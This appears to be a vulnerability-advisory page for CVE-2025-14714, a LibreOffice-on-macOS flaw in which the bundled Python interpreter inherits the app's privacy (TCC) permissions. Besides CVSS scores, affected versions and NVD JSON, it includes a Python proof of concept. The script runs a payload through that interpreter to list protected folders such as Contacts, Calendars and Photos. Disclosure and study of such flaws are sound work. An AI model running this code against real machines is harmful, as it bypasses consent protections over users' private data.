Security Vulnerability Report
中文
CVE-2025-14714 CVSS 6.5 MEDIUM

CVE-2025-14714

Published: 2025-12-15 11:15:40
Last Modified: 2026-02-18 14:32:08
Source: [email protected]

Description

An Authentication Bypass vulnerability existed where the application bundled an interpreter (Python) that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle By executing the bundled interpreter directly the attacker's scripts run with the application's TCC privileges In fixed versions parent-constraints are used to allow only the main application to launch interpreter with those permissions This issue affects LibreOffice on macOS: from 25.2 before < 25.2.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:libreoffice:libreoffice:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
LibreOffice 25.2 (macOS)
LibreOffice 25.2.0 (macOS)
LibreOffice 25.2.1 (macOS)
LibreOffice 25.2.2 (macOS)
LibreOffice 25.2.3 (macOS)
LibreOffice < 25.2.4 (macOS)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14714 PoC - LibreOffice macOS TCC Permission Bypass # This PoC demonstrates how to invoke the bundled Python interpreter # to inherit LibreOffice's TCC permissions import os import subprocess import sys def exploit_cve_2025_14714(): """ LibreOffice macOS TCC Permission Bypass Exploit This vulnerability allows an attacker to execute the bundled Python interpreter which inherits the TCC permissions granted to LibreOffice. """ # Common LibreOffice installation paths on macOS libreoffice_paths = [ "/Applications/LibreOffice.app/Contents/Resources/python", "/Applications/LibreOffice.app/Contents/MacOS/python", os.path.expanduser("~/Applications/LibreOffice.app/Contents/Resources/python") ] python_path = None for path in libreoffice_paths: if os.path.exists(path): python_path = path break if not python_path: print("[-] LibreOffice Python interpreter not found") return False print(f"[+] Found LibreOffice Python at: {python_path}") # Malicious payload - accessing TCC-protected resources malicious_script = ''' import os import sys # Attempt to access TCC-protected resources # This would normally require explicit user authorization print("[*] LibreOffice TCC Permission Bypass - CVE-2025-14714") print("[*] Running with inherited TCC permissions...\n") # Check current user context print(f"[*] Current User: {os.getenv('USER')}") print(f"[*] Current UID: {os.getuid()}") # List accessible directories that may contain sensitive data sensitive_paths = [ os.path.expanduser("~/Library/Application Support/"), os.path.expanduser("~/Library/Contacts/"), os.path.expanduser("~/Library/Calendars/"), os.path.expanduser("~/Library/Photos/"), os.path.expanduser("~/Library/Location Services/") ] print("[*] Accessing potentially sensitive directories:") for path in sensitive_paths: if os.path.exists(path): try: files = os.listdir(path) print(f" [+] {path} - {len(files)} items accessible") except PermissionError: print(f" [-] {path} - Access denied") else: print(f" [-] {path} - Not found") print("\n[*] Note: This script runs with LibreOffice's TCC permissions") print("[*] In vulnerable versions, this can access protected resources without user consent") ''' # Execute the malicious script through LibreOffice's Python interpreter try: print("[*] Executing payload through LibreOffice's Python interpreter...") result = subprocess.run( [python_path, "-c", malicious_script], capture_output=True, text=True, timeout=30 ) if result.returncode == 0: print("[+] Payload executed successfully") print(result.stdout) if result.stderr: print(f"[!] Stderr: {result.stderr}") return True else: print(f"[-] Execution failed with return code: {result.returncode}") print(result.stderr) return False except subprocess.TimeoutExpired: print("[-] Execution timed out") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-14714 - LibreOffice macOS TCC Permission Bypass") print("=" * 60) exploit_cve_2025_14714()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14714", "sourceIdentifier": "[email protected]", "published": "2025-12-15T11:15:39.537", "lastModified": "2026-02-18T14:32:07.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Authentication Bypass vulnerability existed where the application bundled an interpreter (Python) that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle\n\n\n\n\nBy executing the bundled interpreter directly the attacker's scripts run with the application's TCC privileges\n\n\n\n\nIn fixed versions parent-constraints are used to allow only the main application to launch interpreter with those permissions\n\nThis issue affects LibreOffice on macOS: from 25.2 before < 25.2.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libreoffice:libreoffice:*:*:*:*:*:*:*:*", "versionStartIncluding": "25.2.0.1", "versionEndExcluding": "25.2.4.1", "matchCriteriaId": "2E728693-67F3-457E-8B60-96141118F706"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://www.libreoffice.org/about-us/security/advisories/cve-2025-14714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.